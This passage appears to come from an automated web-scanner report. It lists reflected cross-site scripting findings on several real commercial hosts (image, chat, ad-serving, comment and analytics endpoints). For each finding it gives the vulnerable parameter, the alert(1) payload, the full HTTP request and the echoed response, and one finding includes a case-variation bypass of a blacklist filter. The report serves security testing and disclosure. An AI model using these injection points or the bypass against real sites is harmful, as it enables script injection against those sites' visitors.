The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0 was submitted in the REST URL parameter 4. This input was echoed as f5884<img src=a onerror=alert(1)>816bdda8ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NS372_WVA_999f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NS372_WVA_999f5884<img src=a onerror=alert(1)>816bdda8ac0

5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/h6381_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a was submitted in the REST URL parameter 4. This input was echoed as 8eb52<img src=a onerror=alert(1)>e396f72724a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/h6381_4008eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:37:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:00 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/h6381_4008eb52<img src=a onerror=alert(1)>e396f72724a

5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/j7804_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af was submitted in the REST URL parameter 4. This input was echoed as c5b08<img src=a onerror=alert(1)>267c3cd35af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/j7804_400c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:59 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/j7804_400c5b08<img src=a onerror=alert(1)>267c3cd35af

5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/n4728_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b was submitted in the REST URL parameter 4. This input was echoed as c9dce<img src=a onerror=alert(1)>898fe953f5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/n4728_400c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/n4728_400c9dce<img src=a onerror=alert(1)>898fe953f5b

5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308 was submitted in the msessionkey parameter. This input was echoed as cebc0<img src=a onerror=alert(1)>11076a3a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16601155425835&msessionkey=1547318312735205030cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=152897602799-290051536113&protV=20&lpjson=1&id=9784109386&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-computer-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: HumanClickKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 15 May 2011 21:21:46 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31409

lpConnLib.Process({"ResultSet": {"lpCallId":"152897602799-290051536113","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16601155425835'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

5.103. http://serv.adspeed.com/ad.php [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be3d"><script>alert(1)</script>0c2f8c115a9 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad.php?do=html&zid=3253&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:56 GMT
Server: AdSpeed/s3
Content-Length: 400

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-1&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9" alt="i" />
...[SNIP]...

5.104. http://serv.adspeed.com/ad.php [wd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e was submitted in the wd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions, for example by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ad.php?do=html&zid=3253&wd=4686c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:48 GMT
Server: AdSpeed/s3
Content-Length: 400

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-1&wd=4686c4e9"><ScRiPt>alert(1)</ScRiPt>14a7539b42e&ht=60" alt="i" />
...[SNIP]...

5.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 4a6bd<script>alert(1)</script>695fd5a77c8 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb04a6bd<script>alert(1)</script>695fd5a77c8 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89581
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:59 GMT
Connection: close

plcb04a6bd<script>alert(1)</script>695fd5a77c8('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

5.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e174a><img%20src%3da%20onerror%3dalert(1)>4ecb572effa was submitted in the plckcommentonkey parameter. This input was echoed as e174a><img src=a onerror=alert(1)>4ecb572effa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.bloge174a><img%20src%3da%20onerror%3dalert(1)>4ecb572effa&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 34494
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:32 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_10078\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"169725.bloge174a><img src=a onerror=alert(1)>4ecb572effa\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a7b44><img%20src%3da%20onerror%3dalert(1)>0f3978d13fc was submitted in the plckcommentonkeytype parameter. This input was echoed as a7b44><img src=a onerror=alert(1)>0f3978d13fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=articlea7b44><img%20src%3da%20onerror%3dalert(1)>0f3978d13fc&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 34817
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:15 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
_comments_79209\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"169725.blog\" commentOnKeyType=\"articlea7b44><img src=a onerror=alert(1)>0f3978d13fc\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.108. http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.channelintelligence.com
Path:   /pages/prices.asp

Issue detail

The value of the ssku request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c9"%3balert(1)//59b4d9d7a55 was submitted in the ssku parameter. This input was echoed as c34c9";alert(1)//59b4d9d7a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/prices.asp?nrgid=1864&ssku=98285c34c9"%3balert(1)//59b4d9d7a55 HTTP/1.1
Host: sony.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA-94CF-AEFC-64AD-028BB2019E0D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13478
Cache-Control: public, max-age=3600
Expires: Sun, 15 May 2011 21:26:50 GMT
Date: Sun, 15 May 2011 20:26:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
{}
function Window_onResize(){}
function ShowMailForm(rnSCID,rnCTID,rnLocID){
   var sUrl=gsOUrl+'/mailform.asp?cii_nSCID='+rnSCID+'&cii_nCTID='+rnCTID+"&cii_sZip=&cii_nIID=-1&cii_sSKU="+escape("98285c34c9";alert(1)//59b4d9d7a55").replace("+","%2B")+"&cii_nVID=&cii_nLocID="+rnLocID+"&cii_nRGID=1864&cii_nPGID=0&cii_nRadius=15";
   document.location=sUrl;
}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVSt
...[SNIP]...

5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tt.omtrdc.net
Path:   /m2/sony/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 649db<script>alert(1)</script>2be9bd4e51a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox649db<script>alert(1)</script>2be9bd4e51a&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: sony.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 308
Date: Sun, 15 May 2011 21:21:23 GMT
Server: Test & Target

mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).cancelTimeout();mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).setOff
...[SNIP]...

5.110. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b7073<script>alert(1)</script>6a1a3f5c872 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psnb7073<script>alert(1)</script>6a1a3f5c872&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 204
Date: Sun, 15 May 2011 20:27:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbox_psnb7073<script>alert(1)</script>6a1a3f5c872',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");

5.111. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload f5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7 was submitted in the mbox parameter. This input was echoed as f5393<img src=a onerror=alert(1)>cf7112fc6c7 in the application's response.

